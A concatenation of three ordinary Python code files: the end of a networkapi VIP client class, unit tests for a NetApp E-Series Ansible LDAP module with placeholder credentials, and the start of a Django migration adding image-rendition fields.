:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/' + str(id_vip) + '/priority/'
vip_map = dict()
vip_map['reals_prioritys'] = {'reals_priority': reals_prioritys}
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
def alter_filter(self, id_vip, filter_l7, rule_id):
"""Alter the L7 filter of a given vip request.
:param id_vip: Identifier of the request for VIP.
:param filter_l7: the filter itself.
:param rule_id: Optional identifier of a selected rule for the VIP.
:return: Dictionary with the following structure:
::
{ 'sucesso': 'sucesso' }
:raise ScriptError: Failed to execute script.
:raise UserNotAuthorizedError: User doesn't have permission.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
url = 'vip/' + str(id_vip) + '/filter/'
vip_map = dict()
vip_map['l7_filter'] = filter_l7
vip_map['rule_id'] = rule_id
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
def valid_real_server(
self,
ip,
name_equipment,
id_environment_vip,
valid=True):
"""Valid Real Server
:param ip: IPv4 or IPv6. 'xxx.xxx.xxx.xxx' or 'xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx'
:param name_equipment: Equipment Name.
:param id_environment_vip: Identifier of the Environment VIP. Integer value and greater than zero.
:return: Dictionary with the following structure:
::
{'real': { 'ip': {'oct4': < oct4 >, 'oct2': < oct2 >, 'oct3': < oct3 >, 'oct1': < oct1 >, 'version': < version >, 'networkipv4': < networkipv4 >, 'id': < id >, 'descricao': < descricao >},
'environmentvip': {'cliente_txt': < cliente_txt >, 'id': < id >, 'finalidade_txt': < finalidade_txt >, 'ambiente_p44_txt': < ambiente_p44_txt >},
'equipment': {'grupos': < grupos >, 'tipo_equipamento': < equipamento >, 'modelo': < modelo >, 'id': < id >, 'nome': < nome >}}
or 'ip': {'block0': < block0 >, 'block1': < block1 >, 'block2': < block2 >, 'block3': < block3 >, 'block4': < block4 >, 'block5': < block5 >, 'block6': < block6 >, 'block7': < block7 >, 'version': < version >, 'networkipv6': < networkipv6 >, 'id': < id >, 'descricao': < descricao >},
'environmentvip': {'cliente_txt': < cliente_txt >, 'id': < id >, 'finalidade_txt': < finalidade_txt >, 'ambiente_p44_txt': < ambiente_p44_txt >},
'equipment': {'grupos': < grupos >, 'tipo_equipamento': < equipamento >, 'modelo': < modelo >, 'id': < id >, 'nome': < nome > }}
:raise InvalidParameterError: The value of id_environment_vip, ip or equip is invalid.
:raise EnvironmentVipNotFoundError: Environment VIP not registered.
:raise IpNotFoundError: IP not registered, or IP is not related to the equipment and Environment VIP.
:raise EquipamentoNotFoundError: Equipment not registered.
:raise UserNotAuthorizedError: User doesn't have permission.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
real_map = dict()
real_map['ip'] = ip
real_map['name_equipment'] = name_equipment
real_map['id_environment_vip'] = id_environment_vip
real_map['valid'] = valid
url = "vip/real/valid/"
code, xml = self.submit({'real': real_map}, 'POST', url)
return self.response(code, xml)
def get_l7_data(self, id_vip):
""" Get the applied L7 filter, pending (to-apply) filters,
the rollback filter, and the date of the last apply.
:param id_vip: vip request id
:return: Dictionary with the following structure:
::
{'vip' : {'applied_l7_datetime': < applied_l7_datetime >, 'filter_rollback': < filter_rollback >, 'l7_filter': < l7_filter >, 'filter_applied': < filter_applied >, 'filter_valid': < filter_valid > }}
:raise UserNotAuthorizedError: User doesn't have permission.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/l7/' + str(id_vip) + '/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def validate_l7(self, id_vip):
""" Validates the new filter.
:param id_vip: Vip request id
:return: Dictionary with the following structure:
::
{'sucesso': 'sucesso'}
:raise UserNotAuthorizedError: User doesn't have permission.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/l7/' + str(id_vip) + '/validate/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def apply_l7(self, id_vip):
""" Applies the new filter.
:param id_vip: Vip request id
:return: Dictionary with the following structure:
::
{'sucesso': { 'codigo': < code >, 'descricao': {'stderr': < terminal output >, 'stdout': < code > }}}
:raise UserNotAuthorizedError: User doesn't have permission.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/l7/' + str(id_vip) + '/apply/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def rollback_l7(self, id_vip):
""" Applies the last functional filter.
:param id_vip: Vip request id
:return: Dictionary with the following structure:
::
{'sucesso': { 'codigo': < code >, 'descricao': {'stderr': < terminal output >, 'stdout': < code > }}}
:raise UserNotAuthorizedError: User doesn't have permission.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/l7/' + str(id_vip) + '/rollback/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def add_block(self, id_vip, id_block, override):
""" Add a block to the vip rule
:param id_vip: Vip request id
:param id_block: Block id
:param override: 0 or 1 (1 if override filter to apply, 0 if only create new rule with the new block)
:return: Dictionary with the following structure:
::
{'sucesso': {'codigo': < code >, 'descricao': < descricao >}}
:raise VipRequestBlockAlreadyInRule: Block is already in rule.
:raise VipRequestNoBlockInRule: Rule doesn't have any block associated.
:raise InvalidParameterError: Invalid parameter.
:raise UserNotAuthorizedError: User doesn't have permission.
:raise VipNaoExisteError: VIP request not registered.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
url = 'vip/add_block/' + \
str(id_vip) + '/' + str(id_block) + '/' + str(override)
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
# (c) 2020, NetApp, Inc
# BSD-3 Clause (see COPYING or https://opensource.org/licenses/BSD-3-Clause)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible_collections.netapp_eseries.santricity.plugins.modules.na_santricity_ldap import NetAppESeriesLdap
from units.modules.utils import ModuleTestCase, set_module_args, AnsibleFailJson, AnsibleExitJson
from units.compat import mock
class LdapTest(ModuleTestCase):
REQUIRED_PARAMS = {
"api_username": "admin",
"api_password": "password",
"api_url": "http://localhost",
"ssid": "1"}
REQ_FUNC = "ansible_collections.netapp_eseries.santricity.plugins.modules.na_santricity_ldap.NetAppESeriesLdap.request"
BASE_REQ_FUNC = "ansible_collections.netapp_eseries.santricity.plugins.module_utils.santricity.request"
GET_DOMAINS = {"version": "3",
"ldapDomains": [{"id": "test1",
"bindLookupUser": {"password": "***", "user": "CN=cn,OU=accounts,DC=test1,DC=example,DC=com"},
"groupAttributes": ["memberOf"],
"ldapUrl": "ldap://test.example.com:389",
"names": ["test.example.com"],
"roleMapCollection": [{"groupRegex": ".*", "ignoreCase": False, "name": "storage.monitor"}],
"searchBase": "OU=accounts,DC=test,DC=example,DC=com",
"userAttribute": "sAMAccountName"},
{"id": "test2",
"bindLookupUser": {"password": "***", "user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com"},
"groupAttributes": ["memberOf"],
"ldapUrl": "ldap://test2.example.com:389",
"names": ["test2.example.com"],
"roleMapCollection": [{"groupRegex": ".*", "ignoreCase": False, "name": "storage.admin"},
{"groupRegex": ".*", "ignoreCase": False, "name": "support.admin"},
{"groupRegex": ".*", "ignoreCase": False, "name": "security.admin"},
{"groupRegex": ".*", "ignoreCase": False, "name": "storage.monitor"}],
"searchBase": "OU=accounts,DC=test2,DC=example,DC=com",
"userAttribute": "sAMAccountName"}]}
def _set_args(self, args=None):
module_args = self.REQUIRED_PARAMS.copy()
if args is not None:
module_args.update(args)
set_module_args(module_args)
def test_valid_options_pass(self):
"""Verify valid options."""
options_list = [{"state": "disabled"},
{"state": "absent", "identifier": "test_domain"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass",
"names": ["name1", "name2"], "group_attributes": ["group_attr1", "group_attr1"], "user_attribute": "user_attr"}]
for options in options_list:
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args(options)
ldap = NetAppESeriesLdap()
for options in options_list:
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": False})]):
self._set_args(options)
ldap = NetAppESeriesLdap()
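Each NetAppESeriesLdap() construction above consumes two canned responses from the patched request function, one per probe; side_effect with a list hands them out in order. A standalone illustration of that mocking pattern (the request mock and the URL strings below are illustrative assumptions, not the module's real transport):

```python
from unittest import mock

# side_effect with a list: each call to the mock pops the next canned
# response, exactly how the tests above satisfy the firmware-version and
# proxy probes made while constructing NetAppESeriesLdap.
request = mock.Mock(side_effect=[(200, {"version": "04.10.0000.0001"}),
                                 (200, {"runningAsProxy": True})])
firmware = request("GET", "sa/version")   # first canned response
proxy = request("GET", "utils/about")     # second canned response
```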
def test_get_domain_pass(self):
"""Verify get_domain returns expected data structure."""
options = {"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass",
"names": ["name1", "name2"], "group_attributes": ["group_attr1", "group_attr1"], "user_attribute": "user_attr"}
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
with mock.patch(self.REQ_FUNC, return_value=(200, self.GET_DOMAINS)):
self._set_args(options)
ldap = NetAppESeriesLdap()
self.assertEqual(ldap.get_domains(), self.GET_DOMAINS["ldapDomains"])
def test_get_domain_fail(self):
"""Verify get_domain throws expected exceptions."""
options = {"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass",
"names": ["name1", "name2"], "group_attributes": ["group_attr1", "group_attr1"], "user_attribute": "user_attr"}
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
with mock.patch(self.REQ_FUNC, return_value=Exception()):
with self.assertRaisesRegex(AnsibleFailJson, "Failed to retrieve current LDAP configuration."):
self._set_args(options)
ldap = NetAppESeriesLdap()
ldap.get_domains()
def test_build_request_body_pass(self):
"""Verify build_request_body builds expected data structure."""
options_list = [{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass",
"names": ["name1", "name2"], "group_attributes": ["group_attr1", "group_attr1"], "user_attribute": "user_attr"}]
expectation_list = [{'id': 'test_domain', 'groupAttributes': ['memberOf'], 'ldapUrl': 'ldap://test.example.com:389', 'names': ['test.example.com'],
'roleMapCollection': [], 'searchBase': 'ou=accounts,DC=test,DC=example,DC=com', 'userAttribute': 'sAMAccountName'},
{'id': 'test_domain', 'groupAttributes': ['memberOf'], 'ldapUrl': 'ldap://test.example.com:389', 'names': ['test.example.com'],
'roleMapCollection': [], 'searchBase': 'ou=accounts,DC=test,DC=example,DC=com', 'userAttribute': 'sAMAccountName',
'bindLookupUser': {'password': 'adminpass', 'user': 'admin'}},
{'id': 'test_domain', 'groupAttributes': ['group_attr1', 'group_attr1'], 'ldapUrl': 'ldap://test.example.com:389',
'names': ['name1', 'name2'], 'roleMapCollection': [], 'searchBase': 'ou=accounts,DC=test,DC=example,DC=com',
'userAttribute': 'user_attr', 'bindLookupUser': {'password': 'adminpass', 'user': 'admin'}}]
for index in range(len(options_list)):
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args(options_list[index])
ldap = NetAppESeriesLdap()
ldap.build_request_body()
self.assertEqual(ldap.body, expectation_list[index])
def test_are_changes_required_pass(self):
"""Verify build_request_body builds expected data structure."""
options_list = [{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass",
"names": ["name1", "name2"], "group_attributes": ["group_attr1", "group_attr1"], "user_attribute": "user_attr"}]
for index in range(len(options_list)):
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args(options_list[index])
ldap = NetAppESeriesLdap()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
self.assertTrue(ldap.are_changes_required())
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "disabled"})
ldap = NetAppESeriesLdap()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
self.assertTrue(ldap.are_changes_required())
self.assertEqual(ldap.existing_domain_ids, ["test1", "test2"])
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "absent", "identifier": "test_domain"})
ldap = NetAppESeriesLdap()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
self.assertFalse(ldap.are_changes_required())
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test2,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
ldap.add_domain = lambda temporary, skip_test: {"id": "ANSIBLE_TMP_DOMAIN"}
with mock.patch(self.REQ_FUNC, return_value=(200, [{"id": "test2", "result": {"authenticationTestResult": "ok"}},
{"id": "ANSIBLE_TMP_DOMAIN", "result": {"authenticationTestResult": "ok"}}])):
self.assertFalse(ldap.are_changes_required())
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
ldap.add_domain = lambda temporary, skip_test: {"id": "ANSIBLE_TMP_DOMAIN"}
with mock.patch(self.REQ_FUNC, return_value=(200, [{"id": "test2", "result": {"authenticationTestResult": "fail"}},
{"id": "ANSIBLE_TMP_DOMAIN", "result": {"authenticationTestResult": "ok"}}])):
self.assertTrue(ldap.are_changes_required())
def test_are_changes_required_fail(self):
"""Verify are_changes_required throws expected exception."""
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test2,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
ldap.add_domain = lambda temporary, skip_test: {"id": "ANSIBLE_TMP_DOMAIN"}
with self.assertRaisesRegex(AnsibleFailJson, "Failed to authenticate bind credentials!"):
with mock.patch(self.REQ_FUNC, return_value=(200, [{"id": "test2", "result": {"authenticationTestResult": "fail"}},
{"id": "ANSIBLE_TMP_DOMAIN", "result": {"authenticationTestResult": "fail"}}])):
ldap.are_changes_required()
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test2,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
ldap.add_domain = lambda temporary, skip_test: {"id": "ANSIBLE_TMP_DOMAIN"}
with self.assertRaisesRegex(AnsibleFailJson, "Failed to authenticate bind credentials!"):
with mock.patch(self.REQ_FUNC, return_value=(200, [{"id": "test2", "result": {"authenticationTestResult": "ok"}},
{"id": "ANSIBLE_TMP_DOMAIN", "result": {"authenticationTestResult": "fail"}}])):
ldap.are_changes_required()
def test_add_domain_pass(self):
"""Verify add_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body()
with mock.patch(self.REQ_FUNC, return_value=(200, {"ldapDomains": [{"id": "test2"}]})):
self.assertEqual(ldap.add_domain(), {"id": "test2"})
def test_add_domain_fail(self):
"""Verify add_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body()
with self.assertRaisesRegex(AnsibleFailJson, "Failed to create LDAP domain."):
with mock.patch(self.REQ_FUNC, return_value=Exception()):
ldap.add_domain()
def test_update_domain_pass(self):
"""Verify update_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.domain = {"id": "test2"}
with mock.patch(self.REQ_FUNC, return_value=(200, None)):
ldap.update_domain()
def test_update_domain_fail(self):
"""Verify update_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.domain = {"id": "test2"}
with self.assertRaisesRegex(AnsibleFailJson, "Failed to update LDAP domain."):
with mock.patch(self.REQ_FUNC, return_value=Exception()):
ldap.update_domain()
def test_delete_domain_pass(self):
"""Verify delete_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
with mock.patch(self.REQ_FUNC, return_value=(200, None)):
ldap.delete_domain("test2")
def test_delete_domain_fail(self):
"""Verify delete_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
with self.assertRaisesRegex(AnsibleFailJson, "Failed to delete LDAP domain."):
with mock.patch(self.REQ_FUNC, return_value=Exception()):
ldap.delete_domain("test2")
def test_disable_domains_pass(self):
"""Verify disable_domains completes successfully."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.delete_domain = lambda x: None
ldap.existing_domain_ids = ["id1", "id2", "id3"]
ldap.disable_domains()
def test_apply_pass(self):
"""Verify apply exits as expected."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body = lambda: None
ldap.are_changes_required = lambda: False
with self.assertRaisesRegex(AnsibleExitJson, "No changes have been made to the LDAP configuration."):
ldap.apply()
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body = lambda: None
ldap.are_changes_required = lambda: True
ldap.add_domain = lambda: None
ldap.domain = {}
with self.assertRaisesRegex(AnsibleExitJson, "LDAP domain has been added."):
ldap.apply()
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body = lambda: None
ldap.are_changes_required = lambda: True
ldap.update_domain = lambda: None
ldap.domain = {"id": "test"}
with self.assertRaisesRegex(AnsibleExitJson, "LDAP domain has been updated."):
ldap.apply()
self._set_args({"state": "absent", "identifier": "test2"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body = lambda: None
ldap.are_changes_required = lambda: True
ldap.delete_domain = lambda x: None
ldap.domain = {"id": "test"}
with self.assertRaisesRegex(AnsibleExitJson, "LDAP domain has been removed."):
ldap.apply()
self._set_args({"state": "disabled"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body = lambda: None
ldap.are_changes_required = lambda: True
ldap.disable_domains = lambda: None
ldap.domain = {"id": "test"}
with self.assertRaisesRegex(AnsibleExitJson, "All LDAP domains have been removed."):
ldap.apply()
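The tests above repeatedly patch the base request function with a two-element `side_effect` list so that the module's firmware-version probe and proxy check each receive one canned response. A minimal, self-contained sketch of that `unittest.mock` pattern (plain mock, no NetApp code involved):

```python
from unittest import mock

# A list side_effect makes each successive call return the next item,
# mimicking the (status, payload) tuples the tests feed the module.
request = mock.Mock(side_effect=[(200, {"version": "04.10.0000.0001"}),
                                 (200, {"runningAsProxy": True})])

rc, about = request("GET", "storage-systems/about")
rc2, info = request("GET", "utils/login-info")
```

A third call would raise `StopIteration`, which is how an exhausted `side_effect` list surfaces unexpected extra requests during a test.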
# Source: biserici_inlemnite/app/migrations/0100_auto_20211105_1127.py (repo: ck-tm/biserici-inlemnite, license: MIT)
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0099_auto_20211104_1734'),
]
operations = [
migrations.AddField(
model_name='pozeaccese',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozealtar',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozealteelementeimportante',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeamplasament',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozebolti',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeclopote',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozecor',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozecorpbiserica',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozecosoroabe',
